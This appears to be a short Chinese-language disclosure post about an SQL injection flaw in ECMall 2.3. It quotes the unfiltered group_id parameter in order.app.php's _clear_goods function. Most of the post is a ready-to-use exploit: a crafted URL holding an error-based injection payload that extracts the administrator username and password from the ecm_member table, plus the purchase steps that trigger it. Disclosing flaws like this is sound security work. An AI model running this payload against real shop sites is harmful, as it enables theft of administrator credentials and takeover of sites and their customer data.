Ecmall 2.3版本存SQL注入漏洞

漏洞出现在order.app.php文件团购后下订单时 没有对 $_GET['group_id']进行过滤 [php] function _clear_goods($order_id) { switch ($_GET['goods']) { case 'groupbuy': /* 团购的商品 */ $model_groupbuy =& m('groupbuy'); $model_groupbuy->updateRelation('be_join', $_GET['group_id'], $this->visitor->get('user_id'), array( 'order_id' => $order_id, ));//这里没有对$_GET['group_id']进行过滤 break; } } [/php] 漏洞证明: 首先参加一个团购活动,当团购活动结束后,点击购买 ecmall1 点下一步时,更改当前网址如: [php]http://0day5.com/index.php?app=order&goods=groupbuy&group_id=2 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23[/php] ecmall2 然后点击"下单完成并支付"将会出现注入信息,如管理员账号密码等 ecmall3

发表评论